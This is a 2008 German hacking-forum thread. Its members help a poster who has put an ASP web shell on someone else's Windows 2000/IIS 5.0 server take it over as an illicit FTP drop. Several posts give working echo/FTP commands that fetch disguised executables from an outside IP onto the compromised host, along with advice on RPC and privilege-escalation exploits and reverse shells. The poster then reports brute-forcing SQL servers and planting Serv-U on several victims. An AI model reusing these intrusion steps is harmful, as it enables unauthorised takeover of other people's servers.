WIN 2000 Server/IIS 5.0 hacken

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Voter, 26. Januar 2008 .

Schlagworte:
  1. 26. Januar 2008
    Hallo ich brauche Hilfe wie man den im Titel genannten Server hackt habe grad zu einem Server FTP Zugang habe ne .ASP Schell(PHP nicht installiert) hochgeladen und hab die dann über http geöffnet kann jetzt schon Verzeichnisse und Festplatten switchen komm überall rein kann sachen Downloaden Uploaden etc. aber nur über die Shell mit dem FTP bleib ich nur im "ftp-root" Folgene Ports sind geöffnet:
    21 3389 443 25 80 445 135 1026 1025 scheint das MSSQL oder RemoteDesktop nicht aktiviert ist und wenn dann auf einen anderen Port.

    Habe schon bei Milw0rm geschaut aber nichts ansprechendes gefunden.

    könnt ihr mir helfen?
     
    + Multi-Zitat Zitieren
  3. 27. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    Wenn du ne gute ASP-Shell hast, kannste doch über die Befehle ausführen

    Afaik gibts Exploits für IIS 5.0, außerdem gibts das neue RPC-Exploit für Win2k, das kannste mal probieren. RemoteDesktop dürfte normalerweiße aktiviert sein, da port 3389 auf is. 445, 135, 1025, 1026 sind alles RPC-Ports.
     
    + Multi-Zitat Zitieren
  4. 27. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    Tach.

    Also gib mir den Server bzw die Shell und ich installier dir dein FTPD... Wenn du Pech hast, ist aber der FTPD dann nicht mit "root Rechten" gestartet, sodass der FTPD bei jedem Reboot des Servers aus ist. Und außerdem wirst du in diesem Falle keine Passworthashes ziehen können und nichts mit der net oder net1 machen können, da du keine Rechte dafür hast.

    brauchst dann nen local privileg exploit für win2k. oder halt bissel hirn um was anderes zu machen muhaha

    naja wayne...
     
    + Multi-Zitat Zitieren
  5. 27. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    eine shell hab ich drauf gemacht aber nur eine auf Türkisch die versteh erstens nicht richtig und zweitens funktioniert die nur teilweise hat danoch jmd. eine vernünftige (englisch)?
    An ein RPC Exploit hab ich auch schon gedacht aber ich komme damit nicht klar hab mir dieses hier "ausgesucht" aber ich weiß nicht wie ich das Exploit ausführen soll hatte gedacht dass, das ein PHP Xploit ist aber es lässt sich nicht ausführen und ein Perl scheint es ja auch nicht zu sein für IIS 5.0 weiß ich nicht welches Exploit ich nehmen soll
    würde das gerne auch alleine hinkriegen wär dann nähmlich mein erster eigener Str0 und der steht in der Schweiz^^
     
    + Multi-Zitat Zitieren
  6. 27. Januar 2008
    Zuletzt von einem Moderator bearbeitet: 14. April 2017
    AW: WIN 2000 Server/IIS 5.0 hacken

    kannst die shell mal probieren: No File | xup.in
    kp ob die gut ist, hab die erst einmal kurz ausprobiert, aber n versuch ist es ja wert
     
    + Multi-Zitat Zitieren
  7. 27. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    @roadkiller danke für deine shell hab die gleich mal ausprobiert hat nicht viele Funktionen aber egal wichtig ist sie kann sachen ausführen aber ich weiß nicht was ich da zum beiscpil ausführen soll kann ich SerVu hochladen oder geht das nicht weil da ja schon ein ftp installiert ist?
     
    + Multi-Zitat Zitieren
  8. 27. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    klar kannst du da ne servu hochladen, die muss dann halt auf n andern port laufen als der ftp. Falls du noch Probleme hast kannst du mich gerne per PN kontaktieren.
     
    + Multi-Zitat Zitieren
  9. 28. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    hab jetzt mal versucht serv-u hochzuladen da kommt dieser fehler raus

    habs mal ganz genau gemacht damits auch sicher klappt

    Commands:

    echo >> c:\windows.txt
    echo open 200.32.77.77 21 >> c:\windows.txt
    echo user anonymous >> c:\windows.txt
    echo bill@online.de >> c:\windows.txt
    echo binary >> c:\windows.txt
    echo get MSIntskmngr.exe >> c:\windows.txt
    echo get mspaintfixd.tmp >> c:\windows.txt
    echo quit >> c:\windows.txt


    type c:\windows.txt:

    ECHO is on.
    open 200.32.77.77 21
    user anonymous
    bill@online.de
    binary
    get MSIntskmngr.exe
    get mspaintfixd.tmp
    quit


    Ergebnis:

    Invalid command.

    Connected to 200.32.77.77.

    ECHO is on.
    open 200.32.77.77 21
    220 Microsoft FTP Service
    user anonymous
    331 Anonymous access allowed, send identity (e-mail name) as password.

    230 Anonymous user logged in.
    Invalid command.


    binary
    200 Type set to I.
    get MSIntskmngr.exe
    get mspaintfixd.tmp
    quit
    221

    ich weiß nicht weiter
     
    + Multi-Zitat Zitieren
  10. 28. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    Das ist ein c script wenn du linux hast gcc script.c -o script
    Unter Windows brauchste halt nen C-Compiler. Ich denke eh das dein IIS auf minimalen Rechten läuft und du so mit deiner Shell nich weiterkommst. Aber wenn du Daten auslesenkannst würde ich versuchen an wichtige Daten zu kommen um den Server zu übernehmen. Mit deiner asp shell alleine wirste wohl net unter solchen umständen weit kommen.
     
    + Multi-Zitat Zitieren
  11. 28. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    hab zwar kein linux aber ein linuxroot mit shellzugriff kann ich das Exploit dann einfach durch eingaben von "gcc script.c -o script" executen?
     
    + Multi-Zitat Zitieren
  12. 28. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    dadurch compilierst du es, danach kannst du es ausführen ./script +paramater

    //

    bzw kannste auch zb cygwin benutzen
     
    + Multi-Zitat Zitieren
  13. 28. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    ok danke das werd ich dann mal ausprobieren

    Hat jmd ne Idee zu meinen Problem mit dem "Stro Bau"
     
    + Multi-Zitat Zitieren
  14. 28. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken


    aber wäre ein ziemlich großer zufall wenn dein server vuln gegen genau dies exploit ist wollt ich nur nochmal sagen ^^
     
    + Multi-Zitat Zitieren
  15. 28. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    also exploiten mach ich jetzt nicht möchhte erst mal den str0 hinkriegen aber egal was ich auch bei der "echo-Methode" tue es funktionirt nicht

    es kommt immer das raus:

    Invalid command.

    Connected to 200.32.77.77.

    ECHO is on.
    open 200.32.77.77 21
    220 Microsoft FTP Service
    user anonymous
    331 Anonymous access allowed, send identity (e-mail name) as password.

    230 Anonymous user logged in.
    Invalid command.


    binary
    200 Type set to I.
    get msintskmngr.exe
    get mspaintfixd.tmp
    quit
    221

    EDIT: hab jetzt die files einfach ins ftp verzeichnis gehauen und das geht musste jetzt nur noch aus führen aber da ist das nächste problem das file braucht ewig um ausgeführt zu werden hab das mal ganz lange laufen gelassen(also den command über shell) aber es passierte nichts eigentlich müsste das doch innnerhalb von secunden ausführen oder?
     
    + Multi-Zitat Zitieren
  16. 31. Januar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    *Push*

    Also ich habe den Server bisher immer noch nicht unter der kontrolle habe jetzt die Serv-U Dateien hochgeladen aber ich krieg den Server nicht gestartet und ich krieg das einfach nicht hin obwohl es so einfach scheint

    Suche jmd. der mir den letzten Schritt macht und den Serv-u ausführt habe Roadkiller schon kontaktiert aber der antwortet mir nicht oder ist einfach nicht on also wenn mir jmd helfen möchte;( sehr gerne sonst komm ich wohl nicht weiter

    Wie gesagt hab ne schell hochgeladn konnte den get befehl wahrscheinlich nicht ausführen hab den deshalb über offen(anonymouse) ftp hochgeladen mit schell ins richtige verzeichnis getan und wollte das dann über schell ausführen aber egal was ich auch mache: "start C:\msintskmngr.exe" , "c:\msintskmngr.exe /i" "net start "Windows Secure"
    ich krieg ihn einfach nicht gestartet
     
    + Multi-Zitat Zitieren
  17. 3. Februar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    so kann closed werden... hab sein problem gelöst ^^ nun isser glücklich ^^ =)=)=)
     
    + Multi-Zitat Zitieren
  18. 3. Februar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    würde mich juken wie du es gelöst hast... haste deinen ftp raufgeladen und via asp script gestartet? weil dann is der ftpa bekanntermaaßen net als dienst an weil mann meist keine admin rechte hat.. gibt aber ne mögluichkeit sich ne admin shell zu zaubern.

    deine vorgehensweise würde mich mal interessieren =)

    mfg milles
     
    + Multi-Zitat Zitieren
  19. 3. Februar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    ne habs net als dienst gestartet, aber ihm gehts ja drum, dass er scannen kann. kann er jetzt.

    ps: ist win2k sp4 --> also local privileg exploit per reverse shell sollte da abhilfe schaffen. nur ich bin nicht mädchen für alles

    mfg halloweenracer
     
    + Multi-Zitat Zitieren
  20. 4. Februar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    hab noch eine Frage habe jetzt nachdem ich den stro hatte(danke nochmal an Halloweenracer für die Hilfe) gleich mit dem scannen angefangen habe auch gleich massig results gehabt nach dem bruten und ausprobieren hatte ich gleich sql´s ohne sql error hab dann halt per echo die dateien(Serv-u) hochgeladen und wollte die dann starten das Starten über "c:\windows\system32\xxxx.exe /i" ging noch aber das zufügen zu den Diensten mit "NET Start Server Backup" antwortete mit "El nombre de servicio no es válido." das ist Spanisch und heißt das der Name des Services nicht valid bzw. nicht erlaubt ist ich weiß nicht weiter den dort läuft kein AV und ich hab das jetzt schon bei mehrern servern geprüft und da kam das gleiche wenn auch auf Englisch kann mir jmd. helfen mach ich da irgenwas falsch?
     
    + Multi-Zitat Zitieren
  22. 8. Februar 2008
    AW: WIN 2000 Server/IIS 5.0 hacken

    musst den short-servicename nehmen.. also zB serv-u...
    oder halt das "server backup" in anführungszeichen setzen.. also wie Pyro das in der letzten Zeile hat..
     
    + Multi-Zitat Zitieren
  23. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.

Auf dieses Thema antworten